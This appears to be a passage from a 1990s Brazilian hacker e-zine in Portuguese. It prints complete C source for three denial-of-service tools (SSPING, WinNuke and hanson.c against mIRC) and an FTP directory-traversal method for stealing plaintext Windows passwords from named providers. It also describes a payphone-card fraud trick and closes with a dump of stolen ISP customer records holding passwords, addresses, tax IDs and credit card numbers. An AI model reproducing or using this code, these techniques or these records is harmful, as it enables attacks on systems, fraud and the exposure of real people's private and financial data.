-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

void banner(void) {

   printf("\nSSPING 1.0\n");
   printf("by Datagram.\n\n");

}

void usage(const char *progname) {

   printf("usage :\n");
   printf("%s ...\n",progname);
   printf(" < spoof   > : address of ICMP packet sender\n");
   printf(" < dest    > : destination of the ICMP packet\n");
   printf(" < number  > : number of bomb to send\n\n");

}

int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {

   struct hostent *host;

   memset(addr,0,sizeof(struct sockaddr_in));

   addr->sin_family = AF_INET;
   addr->sin_addr.s_addr = inet_addr(name);

   if (addr->sin_addr.s_addr == -1) {
      if (( host = gethostbyname(name) ) == NULL )  {
         fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
         return(-1);
      }
      addr->sin_family = host->h_addrtype;
      memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
   }

   addr->sin_port = htons(port);
   return(0);

}

unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }

    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }

    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

int send_winbomb(int socket,
                 unsigned long spoof_addr,
                 struct sockaddr_in *dest_addr) {

   unsigned char  *packet;
   struct iphdr   *ip;
   struct icmphdr *icmp;
   int rc;

   packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                        	    sizeof(struct icmphdr) + 8);

   ip = (struct iphdr *)packet;
   icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));

   memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);

   ip->ihl      = 5;
   ip->version  = 4;
// ip->tos      = 0;
   ip->id       = htons(34717);
   ip->frag_off |= htons(0x2000);
// ip->tot_len  = 0;
   ip->ttl      = 255;
   ip->protocol = IPPROTO_ICMP;
   ip->saddr    = spoof_addr;
   ip->daddr	= dest_addr->sin_addr.s_addr;
   ip->check    = in_cksum(ip, sizeof(struct iphdr));

   icmp->type     	   = 8;
   icmp->code     	   = 0;
   icmp->checksum 	   = in_cksum(icmp,sizeof(struct icmphdr) + 1);

   if (sendto(socket,
              packet,
              sizeof(struct iphdr) +
              sizeof(struct icmphdr) + 1,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr)) == -1) { return(-1); }

   ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
   ip->frag_off = htons(8 >> 3);
   ip->frag_off |= htons(0x2000);
   ip->check    = in_cksum(ip, sizeof(struct iphdr));

   icmp->type = 0;
   icmp->code = 0;
   icmp->checksum = 0;

   if (sendto(socket,
              packet,
              sizeof(struct iphdr) +
              sizeof(struct icmphdr) + 8,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr)) == -1) { return(-1); }

   free(packet);
   return(0);

}

int main(int argc, char * *argv) {

   struct sockaddr_in dest_addr;
   unsigned int i,sock;
   unsigned long src_addr;

   banner();
   if ((argc != 4)) {
      usage(argv[0]);
      return(-1);
   }

   if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
      fprintf(stderr,"ERROR: Opening raw socket.\n");
      return(-1);
   }

   if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
   src_addr = dest_addr.sin_addr.s_addr;

   if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }

   printf("%s: Sending packets.\n",argv[0]);
   for (i = 0;i < atoi(argv[3]);i++) {
      if (send_winbomb(sock,
                       src_addr,
                       &dest_addr) == -1) {
         fprintf(stderr,"ERROR: Sending packet.\n");
         return(-1);
      }
      usleep(10000);
   }
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

-=> WiNNUKE <=-

        Whooommm....[bocejo]... este eh o treco que manda OOB pro Windows
e ele trava com uma tela azul... pra win95 porta 139 e pra nt porta 59...

[killwin.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int x, y, sockdesc, port = 139, hits = 1;
char *target, *str = "Later.";

void parse_args(int argc, char *argv[]);

void usage(char *progname) {
  printf("Usage: %s <target> [-p port (Default 139)] [-t hits (Default 1)]\n", progname);
  exit(-1);
}

void parse_args(int argc, char *argv[]) {
  target = argv[1];
  if (argv[1][0] == '-') {
    printf("Must specify a target.\n");
    exit(-1);
  }
  for(y=2;y<argc;y++) {
    if (!strcmp(argv[y], "-p")) { y++; port = atoi(argv[y]); }
    if (!strcmp(argv[y], "-t")) { y++; hits = atoi(argv[y]); }
  }
}

void main(int argc, char *argv[]) {

  struct sockaddr_in sin;
  struct hostent *he;

  if (argc < 2) usage(argv[0]);

  parse_args(argc, argv);

  sin.sin_family  = AF_INET;
  sin.sin_port    = htons(port);

  he = gethostbyname(argv[1]);

  if (he) {
    memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
  } else {
    perror("Resolving");
  }

  sockdesc = socket(AF_INET, SOCK_STREAM, 0);

  if (sockdesc < 0) {
    perror("socket");
    exit(-1);
  }

  if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
    perror("connect");
    close(sockdesc);
    exit(-1);
  }

  printf("Connected to [%s:%d].\n", target, port);
  printf("Sending crash %d times...\n", hits);

  for (x=0;x<hits;x++) send(sockdesc, str, strlen(str), MSG_OOB);
  sleep(1);
  printf("Done....\n");
  close(sockdesc);
  exit(0);
}

-=> HANSON <=-

        O hanson.c e' somente um codigozinho que usa uma falha de portas
deixada pelo mIRC 5.3... voce deve usar com a porta do cara. Use a 113
ou a 69. Have fun! :)

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

/*  hanson.c - by myn with help from h2o and watcher *thanks*

    This lil program exploits mIRC's bound sockets, making the client crash

    mIRC can handle a mass influx of data but cannot handle strings of data
    that are parsed internally through mIRC. This program forces mIRC to
    parse incoming data and identify it, the result from the parse
    is larger then mIRC's buffer string size, thus making the
    client crash :).  This will create 5 connections to the bound port and
    then send the string.

    Its like sending double "int" when you only had 1 bit to work with!

    hanson.c is dedicated to all the lil 13 to 16 year old geeks (abyss)
    that are in love with those cute boys..

          myn@efnet

*/

/* FILE GOT IN THE DEATH KNIGHTS! www.deathknights.com */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

int x, s, i, p, dport;
/* SET STRING HERE */
char *str = "9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 * 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("     Connected to [%s:%d].\n",server,port);
        return;
}

void main(int argc, char *argv[]) {
     int t;
     if (argc != 3) {
       printf("hanson.c - myn@efnet\n\n");
       printf("This lil program exploits mIRC's bound sockets, making the client crash\n\n");
       printf("Usage: %s <target> <port>\n",argv[0]);
       exit(0);
     }
     printf("hanson.c - myn@efnet\n\n");
     for (t=0; t<5; t++)
     {
     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }
     p = atoi(argv[2]);
     open_sock(s,argv[1],p);

     printf("     Sending string 1ooo times to %s port %i... \n", argv[1], p);

     for (i=0; i<1000; i++) {
       send(s,str,strlen(str),0x0);
     }
     printf("mmmmb0p.\n");
     }
     close(s);
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

-=[  7  ]=-
.----------------------.
| Win 95 & NT passwords \____________________________________________________
`----------------------------------------------------------------------------'
                                by Cacaio

        Voce deve estar pensando... 'pra que falar de windows aqui?', e eu
logo respondo: por que grandes provedores que ate querem ser os maiores da
america latina estao usando, sendo assim mais vulneraveis do que nao sei o
que... (caso do big-head.sol.com.br, mas nao vou falar nada sobre isto,
somente que rodavam windows ate... ja falei que nao vou falar sobre isto!)
        Voce logo pensa; o sistema de encriptacao de senhas do windows deve
ser diferente de unix e 'sabores', assim digamos, mas ai esta o ponto: nem
encriptados sao! Estao em modo TEXTO no registro! Ai basta voce achar a
porta de FTP deles, entrar, usar o veho bug do CD(falarei dele), e achar
o arquivo para fazer a festa!

        Bug do CD... este bug e' muito simples, mas 90% dos FTPD's para
windows o aceitam, o caso e que voce vai pedir um diretorio, que na verdade
e' a raiz, e o ftpd aceita! Olhe o exemplo:

        cd /C:\

        Pronto! Voce esta na raiz da unidade C:\ da maquina! Isto pode
ser feito tambem com outras unidades, logico... Estando ra raiz, voce tem
acesso a todos os outros locais, assim como o root, mas nao tem algumas
permicoes como gravar ou apagar, mas ler voce pode! Entao... pegue o arquivo
de registro do sistema(se voce nao sabe onde fica, problema seu).

        Abra o arquivo com qualquer editor de registro e pegue as senhas
em TEXTO! Sem misterio! Ai vai onde encontrar as senhas no registro:

-=> SENHAS <=-

hkey_local_machine\system\controlset001\services\gophersvc\parameters
                      ...\controlset002\"
                      ...\curentcontrolset\"
                                             ...\msftpsvc\parameters
                                             ...\w3svc\parameters\

-=> USERNAMES <=-

\hkey+local_machine\software\microsoft\windowsnt\currentversion\winlogon\
                ...\system\controlset001\services\bh\parameters
                      ...\controlset002\"
                      ...\curentcontrolset\"
                ...\services\gophersvc\parameters\anonymouseusername
                                              ...\logsqlusername
                         ...\msftpsvc\parameters\anonymoususername
                                             ...\logsqlusername
                         ...\w3svc\parameters\anonymoususername
                                             ...\logsqlusername

        Agora voce ja tem tudo! Arrume um provedor que ainda use windows
(caso da PersoCom e PersoGo), entre la e voce ja sabe o que fazer...
se vire! Hey, voces da PersoCom e PersoGo, nao venham reclamar dizendo que
falei para atacarem aih nao, eu somente citei dois provedores que ainda
usam windows...

-=[  8  ]=-
.----------------------------------.
| Comandos mais utiliazdos no Linux \________________________________________
`----------------------------------------------------------------------------'
                        by pIst0lS and ReNeGaDe

     Depois de muito tempo pensando o que fazer para o nosso zine, eu com
grande ajuda do ReNeGaDe vamos tentar mostrar para voce os comando mais
utilizado no Linux. Bom, para comeцїar vamos deixar bem claro que vamos
falar sobre os comandos mais utilizados no Linux, lembrando que nao sao
todos os comandos.

     who (ou w)  -=> ver quem esta' logado
     pwd         -=> ver diretorio atual
     mkdir       -=> cria um novo diretorio
     ls          -=> lista de arquivos do diretoria atual
     cp          -=> copia arquivos
     mv          -=> move arquivos
     rm          -=> deleta arquivos
     kill        -=> elimina processo e users
     wall        -=> envia mensagem a todos os users conectados
     cc ou gcc   -=> compilar
     find        -=> procurar arquivos
     date        -=> exibe data e hora de seu sistema
     su          -=> troca de user sem presisar do logout
     touch       -=> cria um arquivo fazio
     free        -=> mostra a quantidade de memoria fisica e swap desponivel
     df          -=> visualisa espaco nas particoes
     talk [user] -=> entra em chat com outro usuario

     Bom, ai foram alguns comandos mais utilizados para o Linux, se voce tem
algo a reclamar a respeito a essa materia envie e-mail para nos. Na proxima
edicao naun sei o que irei escrever, peco a ajuda de todos os leitores do
zine.
Valeu!

-=[  9  ]=-
.--------------.
|  Phreakering  \____________________________________________________________
`----------------------------------------------------------------------------'
                                 by Mantra

        Gostaria de me desculpar aos leitores da zine pela ausencia e
demora na entrega de minhas materias; infelizmente tivemos problemas
com um antigo redator do zine, esse foi o motivo principal da demora.

        Bem, pretendo escrever daqui pra frente duas materias na zine.
Em uma continuarei a tratar sobre phreakering, na outra pretendo escrever
sobre eletrotecnica, uma forma de complementacao puramente tecnica pra
quem deseja montar suas proprias boxes, conhecer como as mini antenas
codificam os sinais (o chamado pay per view), e talvez alguma coisa
relacionada a montagem de placas impressas mais complexas, talvez saia
alguma coisa em HTML mas por enquanto sao so' projetos. Em janeiro espero
entregar a primeira materia dupla.

	Comecei ontem a traduzir a Motorola Bible (MotBible), como o nome
ja diz; biblia motorola. E' uma grande fonte de informacao para quem pretende
dominar a fundo a linha de telefones analogicos Motorola. A linha digital e'
completamente diferente, mas em breve teremos novidades por ai. Segue abaixo
uma materia muito feita muito em cima da hora (essa materia da zine foi
escrito em 5min!).

	Bem, aqui segue um breve resumo sobre a materia anterior que coloquei
no zine; Use um negativo de filme fotografico e cubra totalmente a parte de
tras do cartao telefonico com o filme. Ja' que o aparelho nao possui micro-
fusiveis e sim ligacoes metalicas que sao desfeitas eletromagneticamente, o
filme fotografico ira' impedir que essas ligacoes se desfacam. Portanto
coloque o negativo na parte de tras do cartao, nao prcisa colar, e faca a
ligacao. Em alguns aparelhos ocorre um problema; a ligacao so' e' completada
quado o numero de unidades do cartao diminui. Se o aparelho percebe que o
cartao continua com o mesmo numero de unidades a ligacao se deafaz (cai),
assim como quando se passa o cartao varias vezes e depois se para derepente:
as unidades sempre aumentam, mas quando a pessoa atende a ligacao o aparelho
reconfere as unidades a acaba por desfazer a ligacao na hora! A tecnica do
filme funciona de fato. Recebi inumeras mensagens de pessoas que realizaram
com sucesso, mas sei por intermedio de tecnicos da teleceara que em alguns
aparelhos nao funciona. Vou me informar a respeito e nos proximos zines respondo.

        Nao esqueci da promessa de fazer uma serie de materias sobre
telefonia basica envolvendo celulares, telefones residenciais e telefonia
publica. Prometo que assim que tiver tempo concluo as materias.

-=[  ??  ]=-
.----------.
|  BONUS 1  \________________________________________________________________
`----------------------------------------------------------------------------'
                                 by Cacaio

        Aih vai um presentao! Senhas da mandic e mais os dados pessoais
dos clientes! Se divirtam!!!
        Se a sua senha esta aqui nao venha reclamar! Quem mandou escolher um
provedor com a seguranca tao fraca ou usar uma senha tao facil???
        Se e voce e um destes usuarios, mude sua senha e nao reclame.

fabbio:active:com:Fabio dos Santos e Santos:Al Ribeirцёo Preto 86 ap 132:Sao Paulo:SP:01331000:Estudante:20/10/74::2877897::27288593886:4011461945376013:0399:cartao:230297:
fsmalta:1950:com:Francisco Salles Malta:Rua Dom Henrique 386:sao paulo:sp:04032120:Engenheiro:18/02/74::011 5708263:011 5723473:06410480849:4934930040150014:1298:cartao:230297:
olintosa:pedro:chavepro:olinto da silva mendes de sa:rua magalhaes couto 763 bloco 7 apto 103 meier:rio de janeiro:rj:20735180:cenografo:08/05/53:021-3720566:021-249-2802:021-5912047:27678393768:5390613014080391:0299:cartao:230297:U#fE9q%mntjeRM4
lbjunior:CELI:com:LUCIANO FRANCO BARRETO JUNIOR:RUA SERGIPE 429 AP21:SAO PAULO:SP:01243001:ESTUDANTE:23/02/97:079 9826516:011 2588386:011 2588386:53310993515:376426871912013:1198:cartao:230297:
messane:12345:com:CANDIDO REYNALDO MESANELLI:ADOLFO CASAIS MONTEIRO 382:Sц┐O PAULO:SP:04648040:APOSENTADO:20/04/41:253-2011:524-5403::03779165872:4532110000570396:0298:cartao:230297:
euclides:planplan:com:euclides manoel dos reis:rua constantino de souza 454 apto 152:sao paulo:sp:04605001:analista de sistemas:21/11/50:011 8228070:011 2406299::50964321815:4984221470319025:0398:cartao:230297:
salves:ISABELE:com:Jose Luis Alves:Rua Joaquim Israel de Macedo 257 - Km 18:Osasco:SP:06114140:Mandrilhador:20/10/49:0117049187:0117059919::56678517849:4011300026018013:0998:cartao:230297:
wayhs:nando:com:Monica Lisboa Chang:Rua Onze de Junho n 415 apt 63:Sao Paulo:sp:04041052:Medica:29/11/70:5496222::::4984226577499026:1097:cartao:230297:
kwaty:regiana:chavepro:luiz felicio jorge:rua visconde de maranguape 28:sao paulo:sp:04610050:estudante:30/07/70::011 2409527:011 2409527:26680046831:5493271506600394:0899:cartao:230297:exR4N4Xf2fgQFYd
stellav:s123456:fam:Stella Veneri:Av. Sцёo Valц╘rio 618:Sцёo Paulo:SP:05603010:Administradora:11/02/54:011 2556311:011 8140588:011 2556311:03350248829:376440862141003:0398:cartao:230297:
vrp:shelter:com:VERA REGINA PRETO:R MARQUES DE REZENDE 154:SAO PAULO:SP:04770080:ANALISTA DE SISTEMAS:25/03/62:011-5469011:011-5236737::03400931888:5390823710360126:0699:cartao:230297:
ruicunha:melina:com:Rui Cunha:Av. Rebouцїas 1511 ap. 14:Sцёo Paulo:SP:05401200:Analista de Sistemas:26/06/62:(011) 833-4324:(011) 280-6885::02145554882:4551840019581572:1299:cartao:230297:
mariza:mara:com:Marizete Araц╨jo:R. Roque de Mingo 84:Sцёo Paulo:SP:05759290:Revisor de texto:12/06/60::011-5513-7383:011-5513-7383:04822006859:4984108522569022:1297:cartao:230297:
capistr:RDG:com:Rodrigo Moreira de Capistrano:Rua Vice-Gov. Rubens Berardo 175/805 bl.02:Rio de Janeiro:RJ:22451070:Adm. Empresas:09/02/67:021-276-6094:021-294-6234:021-276-6994:90834046768:5390320123650110:0798:cartao:230297:
kiyoshi2:bala:com:Kiyoshi Watanabe:Rua Ciridiao Durval 58 - ap 43:Sao Paulo:SP:04360020:Tecnico em Edificacoes:26/03/48:011-276-6137:011-531-9237::24342394804:5390642581540198:0899:cartao:230297:
durand:princesa:com:Marcelo Durand:Cel. Joao Maximo de C. Filho 60:Sao Paulo:SP:04136050:Analista de Sistema:23/10/74:0011 66-3434:0011 578-8071:0011 578-8071:18711184841:5493713465900380:0199:cartao:230297:
marquesm:marques:com:Marcelo Marques:Av. Nsa. Senhora do Sabarц║ 507 - ap. 71B:Sцёo Paulo:SP:04685001::25/04/69::011 246-3779::11291687866:5493214266650902:0699:cartao:230297:
npereira:64588:especial:NEWTON PEREIRA DOS SANTOS:RUA FAUSTINO PAGANINI 175:Sц┐O PAULO:SP:03732010:ELETRICITц│RIO:28/12/58:(011)546-1817:(011)296-1554::01207394882:4551661174377006:1298:cartao:230297:
pc:BIA:com:paulo cesar allves ribeiro:al. santos 364 apto 62:sao paulo:sp:01418000:ger. adm:31/03/57:011 8857400:011 2886948::93668392820:5390113288111055:0998:cartao:230297:
wablemes:cerv:com:Wagner Batista Lemes:Rua Antartico 140:Barueri:sp:06412030:Engenheiro Quimico:05/02/97::01172984567::08611494830:4915147081358017:0298:cartao:230297:
redson:jbr154t:com:Rodrigo Edson Castro Avila:R. Pedro Teixeira 240:Boa Vista:RR:69306060:Tecnico em Edificaцїц╣es:22/12/76:095 971 2769:095 224 2227:095 224 2227:44738307215:4984100771480209:0797:cartao:230297:
erwin:victor:com:erwin rossetto vanni:rua otacilio tomanik  343  184 b:sao paulo:sp:05363000:medico:29/02/97:011 7012878:011 8697052:011 7014180:04793108822:5390556608402564:0199:cartao:230297:
reschke:digital:com:Paulo Eduardo Reschke:Rua Viaza 374 ap. 92-A Jd. Aeroporto:Sцёo Paulo:SP:04633050:Estudante:30/12/78:011-5334066:011-5334066:011-5335787:11475641087:4011320006097076:0997:cartao:230297:
mady:martini:travel:Marigildo de Camargo Braga:pituto@mandic.com.br:::::::2144958:2144958:00651176891:5448280013870248:1198:cartao:230297:
mviana:vira23da:com:Marcelo Viana de Pinho:Rua Fц║bio da Luz 325 apt. 506 - Mц╘ier:Rio de Janeiro:RJ:20720350:Analista de suporte:28/12/72::021+2898678::01195074719:4551810004501455:1299:cartao:230297:
mleitao:lactato:com:Marcelo Bichels Leitцёo:Rua Gastцёo Cц╒mara 499 ap 191:Curitiba:PR:80730300:Mц╘dico:05/03/65:041 2327034:041 2228903:041 2327034:66131707987:4916741079299222:0698:cartao:240297:
paulica:6881:com:ana paula marcondes:rua jose antonio coelho 300 apto 105 b:sao paulo:sp:04011060:analista de sistemas:19/08/68:011-8198582:011-5497100::05741134874:4011440008412014:1298:cartao:240297:
scarlet:27064911:com:MцЄnica Farias dos Santos:Av. Paula Ferreira 89 aptб╨ 32-D:Sцёo Paulo:SP:02908900:Jornalista:25/10/68:011- 221.2155:011- 876.3271:011- 876.3271:26586368812:4011440201049019:1099:cartao:240297:
maumarca:RUMPELTILTSK:pop:MAURICIO MARTINS CARNEIRO:RUA MATA REDONDA 10:SAO PAULO:SP:02252000:OFICIAL DA POLICIA MILITAR::011- 543- 7033:011- 202- 0210:011- 202- 0210::5493710769570232:1298:cartao:240297:
domenic:AMANDA:pop:MARIO LUCA:RUA JOSE EDUARDO NUNES 155:SAO PAULO:SP:05625110:GER. ASSIST. Tц┴CNICA:08/09/62:7922-8600:844-7030::02324589877:5390559922310240:0799:cartao:240297:
ricfiori:animal:pop:RICARDO FIORINI:::::::::::4984202872470210:0598:cartao:240297:
cineral:MANDICTV:chavepro:CINERAL ELETRONICA AM LTD:R Antonio de Barros:Sao Paulo:SP:03089000:Fabricante de TV:19/02/97:(011)942-0422::(011)942-0900:34024107968:376432434581006:1297:cartao:240297:y&Dx@2%GxM6vK4=
aggf:0109:com:Artur Garrastazu Gomes Ferreira:Rua dos Andradas 1237 - 7б╨ andar:Porto Alegre:RS:90020009:Empresц║rio/Informц║tica:01/09/60:051-226 15 28:051-224 67 27:051-226 15 28:33394784068:376431778151012:0999:cartao:240297:
anrv:3236388:func:Alex das Neves Ribeiro Viana:Rua Inacio Rego Pessoa 323:Sao Paulo:sp:05549280:Suporte Tecnico:07/10/73:8700888:8105756:8163245:18549074845:::cartao:240297:
sistema:liceu127:com:SISTEMA CONSULTORES ASSOCIADOS:Av. Paulista 1159 - 12б╨ and - cj 1203/1212:Sцёo Paulo:SP:01311922:Assessoria Tributц║ria::011-285-6077:011-288-2010:011-289-7516:62269055000159:376432202081007:0899:cartao:240297:
moralez:150962RM:com:RENATO MORALEZ:RUA NOVA Fц│TIMA 166:Sц┐O PAULO:SP:04688040:PROF. / CONSULTOR INFORMц│TICA:15/02/97:011 979 06 56:011 524 1157::04542064883:4011300283673013:1298:cartao:240297:
tavitian:corsario:com:abraham armenak tavitian:rua sabarц║ 315 apto 801  higienopolis:sцёo paulo:sp:01239011:estudante:01/05/71::(011) 256-6926::13262420832:5448827871040171:0899:cartao:240297:
ausano:73919-7:com:Ausano Risso Junior:rua Joao Maria da Silva 82:Sao Paulo:sp:04679160:Promotor de Vendas:12/03/48:011-5245233:011-548-8156::06644660878:5493809321400167:0698:cartao:240297:
vincent:whitepar:com:Vicente Antonio Cestari Neto:Rua Fernao Dias 155:Sao Paulo:SP:05427010:Engenheiro:24/09/68:011.870 3898:011.212.4845:011.212.4845:17335730899:4551810005741944:0899:cartao:240297:
ciomarva:cabeca:com:mц║rcio valц╘rio lins:av. mal. tito 1662-a:sцёo paulo:sp:08022010:corretor:04/01/61:011-9565304::0119565304:05577908833:4914391014007017:0598:cartao:240297:
rbcosta:horsedog:com:Roberto Baptista da Costa:Rua Carmo do Rio Verde 144:Sao Paulo:SP:04729010:Diretor Presidente:18/08/37:11 247-0177:11 246-8523:11 523-0150:01161873872:376440705501009:1298:cartao:240297:
teckma:TECKMA:com:TECKMA ENGENHARIA:R. AGOSTINHO LATTARI 839:SAO PAULO:SP:03125080:PRESTAц┤ц┐O DE SERVIц┤OS::011 273.7129::011 63.0739:00005275000118:5390818371080120:1298:cartao:240297:
feetoni:bel08393:especial:Fernando Sequeira de Cerqueira:R Dr Nicolau Alberto Defina 365 - bl2 apto33:Sцёo Paulo:SP:04291000:PsicцЁlogo:17/11/64:011-273.4592:011-5071.0199:011-5071.0199:08463661858:5390821878480124:0499:cartao:240297:
dadatour:120473:com:Odacy Paulino Panhoni:R. Mal. Deodoro 295 apto. 162:Sцёo Paulo:SP:04738000:turismo:01/03/45:(011) 524-0867:(011) 524-0867:(011) 247-7703:04228578829:376440766371011:0599:cartao:240297:
teka:pctaps:com:Thais Keller Lopes Seguro:Rua Vasco da Mota 70:Sцёo Paulo:SP:03089020:operadora grц║fica:06/06/74:6191.2625:293.1026:6191.2625:18604017836:5493202560031135:0499:boleto:240297:
erevan:erevan:com:Erevan Engenharia S.A.:Rua Caiubi 75:Sцёo Paulo:SP:05010000:Construцїцёo Civil::011 8730055::011 2631726:33138751000470:5390816701920320:1099:boleto:240297:
shoptime:24horas:manual:TV Sky Shop Ltda.:Av. Embaixador Abelardo Boeno 477:Rio de Janeiro:RJ:22775040:::(021) 442-1193::(021) 442-2316:00776574000156:::boleto:240297:
rjmp:8888:com:Ruy Jorge Monteiro Pedreira:Avenida dos Carinц║s 634:Sцёo Paulo:SP:04086011:Adm. de Empresas:10/03/43:011-546-1752:011-241-8140:011-531-4109:06247636849:5448213678691401:0698:cartao:240297:
otimotex:tecido:com:chang won ahn:r caiowaas 2046 114 bl-4:sao paulo:sp::administrador:15/03/69:011-2911699:011-2289585:011-692-3451:12620054850:4532110000745881:1299:cartao:240297:
olgakert:gabi:com:Olga Facciolla Kertzman:Rua Bastos Pereira 347:Sцёo Paulo:SP:04507011:PsicцЁloga:04/10/61::011-887-5983:011-887-5983:03024990836:376423100153006:0299:cartao:240297:
scalaadu:SCALA:com:SCALA ASSESSORIA ADUANEIRA LTDA:RUA MANUEL CEBRIAN FERRER45:Sц┐O PAULO:SP:04023070:DESPACHOS  ADUANEIROS::011 5392876:011 4172171:011 5713019:66630666000131:5493821350150126:0499:cartao:240297:
jdgl:lorena:com:JOSц┴ DOMINGOS GONц┤ALVES LIMA:CAIXA POSTAL 80 - CENTRO:SENHOR DO BONFIM:BA:48970000:ELETROTц┴CNICO:04/08/61:074 841-4616:074 841-1894:074 841-1894:19056702572:376423395596000:0199:cartao:240297:
gramulha:rosa:com:Luiz Carlos Gramulha:Rua Corta Vento 36-A:Sцёo Paulo:SP:03313010:Contabilista:01/02/97:(011) 293-1718:(011) 218-0313:(011) 294-6410:07365408812:4011313201939010:1198:cartao:240297:
eudes:elaine:com:jose eudes rodrigues de freitas:r. dep. joao sussumo hirata 365 bl. 1 apto 41:sao paulo:sp:05715010:industrial:26/09/69:011-972-8939:011-844-1470:011-844-1470:10085296805:4551530082421000:0698:cartao:240297:
fd:opusdei:com:Fabio Dutra:Rua Geneve  6:Sцёo Paulo:SP:02440000:Engenheiro civil:11/02/97:0118469835:0112903109::41805526200:4916741289048211:0898:cartao:240297:
gaspari:cereja:fam:Roberto Gasparini:R. Jesuino Arruda 325 - Ap/162:Sцёo Paulo:SP:04532080:Empresц║rio:11/02/97:011 30612777:011 8814876:011 30612777:06614035800:376440169451014:1198:cartao:240297:
bobchiav:breno:com:Roberto Chiavelli:R. Ana Neri 420:Santo Andrц╘:SP:09220030:Publicitц║rio:15/05/62:011-289-9111:011-446-1760:011-283-2444:05856427882:4916741457711012:1198:cartao:240297:
pedrolm:3330:com:Pedro Luiz Manoel:Rua Maranhao738 cj.51:Sao Paulo:SP:01240000:Fisioterapeuta:09/02/97:011 668685:011 5499986:011 668685:02023271835:36223908630029:1197:cartao:240297:
calberto:souza:com:carlos alberto de souza:r. salvador sala 131 / 81-e:sao paulo:sp:02914030:gerente contas:02/02/97:0115341085:0118774235::85840378887:5390556914991532:0699:cartao:240297:
rfn:NEPTUNO:chavepro:Renato Ferraz Negreiros:R. Maragojipe 116:Sцёo Paulo:SP:03412050:DBA:::293-5560:::4002353791980215:0499:cartao:240297:vth&saZPYhr2xUN
aureliof:MAmarcao:chavepro:Marco Aurц╘lio Rodrigues Ferreira:Pцїa. 7 de Setembro 61:Frutal:MG:38200000:Advogado:17/05/65:034 4212014:034 4212215:034 4212014:53776410604:5390777765080825:0698:cartao:240297:7UeajyvAvCn8***
lsbs:1453:com:LUIZ SERGIO BARRETO DOS SANTOS:RUA GASPAR VIEGAS  60:SAO PAULO:SP:05339040:ECONOMISTA:14/05/53:011-4942189:011-8190466::76496953872:4920520032208486:1297:cartao:240297:
wilma:morangos:com:Wilma S. L. de Aquino:Rua Mons. du Dreneuf-110:Sao Paulo:SP:04286080:Economista:11/03/55::011 2731455::14316283871:4984222677249031:0198:cartao:240297:
eamarelo:lusa30:com:Eduardo Gil Amarelo:Rua Girassol 1291 - apto. 102:Sцёo Paulo:SP:05433002:Bancц║rio:17/05/64:011 248-4421:011 815-7615::47863129672:4934930040012016:1298:cartao:240297:
clegel:gelcle:com:Rogerio Santos de Lima:Alameda Jau 205 ap 61:Sцёo Paulo:SP:01420000:Analista de Sistemas:17/04/66:011 525.4506:011 288.1385::06908129810:376433893531003:0299:cartao:240297:
glm:gilberto:com:gilberto leite menezes:rpimenta bueno nб╨ 65 apt22:sцёo paulo:sp:03060000:estudante:14/05/73:011 693-7608:011 292-1507::25857521866:376423453751042:0899:cartao:240297:
marcostp:plus01:com:Marcos Tito Pereira:R.Antonio Gouveia Giudice 767:Sцёo Paulo:SP:05460000:Engenheiro:27/07/66:(011) 867-8311:(011) 211-3261:(011) 867-8311:14306288803:376428192451002:0599:cartao:250297:
